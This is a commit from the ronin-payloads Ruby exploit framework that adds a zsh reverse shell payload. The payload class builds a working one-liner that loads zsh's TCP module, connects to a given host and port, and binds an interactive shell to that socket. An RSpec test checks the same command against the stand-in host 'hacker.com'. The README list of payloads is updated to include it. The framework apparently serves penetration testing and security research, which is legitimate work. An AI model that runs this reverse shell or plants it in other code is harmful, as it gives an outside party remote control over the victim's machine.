Added the cmd/zsh/reverse_shell payload (closes #103).

ronin-rb · Dec 20, 2023 · 0709e2b · 0709e2b
1 parent 7a38292
commit 0709e2b
Show file tree

Hide file tree

Showing 3 changed files with 93 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -43,6 +43,7 @@ research and development.
     * PowerShell
     * Python
     * Ruby
+    * Zsh
   * Java
     * Reverse shell
   * Groovy
@@ -120,6 +121,7 @@ $ ronin-payloads list
   cmd/python/reverse_shell
   cmd/ruby/reverse_shell
   cmd/windows/download
+  cmd/zsh/reverse_shell
   groovy/reverse_shell
   java/reverse_shell
   php/cmd_exec

diff --git a/lib/ronin/payloads/builtin/cmd/zsh/reverse_shell.rb b/lib/ronin/payloads/builtin/cmd/zsh/reverse_shell.rb
@@ -0,0 +1,55 @@
+# frozen_string_literal: true
+#
+# ronin-payloads - A Ruby micro-framework for writing and running exploit
+# payloads.
+#
+# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-payloads is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-payloads is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-payloads.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/payloads/command_payload'
+require 'ronin/payloads/mixins/reverse_shell'
+
+module Ronin
+  module Payloads
+    module CMD
+      module Zsh
+        #
+        # A basic zsh reverse shell command.
+        #
+        # @since 0.2.0
+        #
+        class ReverseShell < CommandPayload
+
+          include Mixins::ReverseShell
+
+          register 'cmd/zsh/reverse_shell'
+
+          description <<~DESC
+            A basic zsh reverse shell command.
+          DESC
+
+          #
+          # Builds the zsh reverse shell command.
+          #
+          def build
+            @payload = "zsh -c 'zmodload zsh/net/tcp && ztcp #{host} #{port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
+          end
+
+        end
+      end
+    end
+  end
+end
diff --git a/spec/builtin/cmd/zsh/reverse_shell_spec.rb b/spec/builtin/cmd/zsh/reverse_shell_spec.rb
@@ -0,0 +1,36 @@
+require 'spec_helper'
+require 'ronin/payloads/builtin/cmd/zsh/reverse_shell'
+
+describe Ronin::Payloads::CMD::Zsh::ReverseShell do
+  it "must inherit from Ronin::Payloads::CommandPayload" do
+    expect(described_class).to be < Ronin::Payloads::CommandPayload
+  end
+
+  describe ".id" do
+    subject { described_class }
+
+    it "must equal 'cmd/zsh/reverse_shell'" do
+      expect(subject.id).to eq('cmd/zsh/reverse_shell')
+    end
+  end
+
+  let(:host) { 'hacker.com' }
+  let(:port) { 1337 }
+
+  subject do
+    described_class.new(
+      params: {
+        host: host,
+        port: port
+      }
+    )
+  end
+
+  describe "#build" do
+    before { subject.build }
+
+    it "must build an `zsh` command that connects back to the host and port params" do
+      expect(subject.payload).to eq("zsh -c 'zmodload zsh/net/tcp && ztcp #{host} #{port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'")
+    end
+  end
+end